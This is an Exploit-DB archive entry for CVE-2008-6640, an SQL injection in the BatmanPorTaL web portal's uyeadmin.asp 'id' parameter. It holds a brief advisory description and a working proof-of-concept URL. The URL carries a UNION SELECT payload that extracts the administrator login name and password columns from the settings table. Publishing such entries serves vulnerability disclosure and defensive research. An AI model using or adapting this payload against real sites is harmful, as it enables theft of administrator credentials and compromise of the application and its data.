BatmanPorTaL - uyeadmin.asp id Parameter SQL Injection

2008-05-05T00:00:00
ID EDB-ID:31745
Type exploitdb
Reporter U238
Modified 2008-05-05T00:00:00

Description

BatmanPorTaL uyeadmin.asp id Parameter SQL Injection. CVE-2008-6640. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/29057/info

BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/lab/BatmanPorTaL/uyeadmin.asp?islem=uyeduzenle1&id=0+union+select+0,(admin_kd),2,1,(admin_pw),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar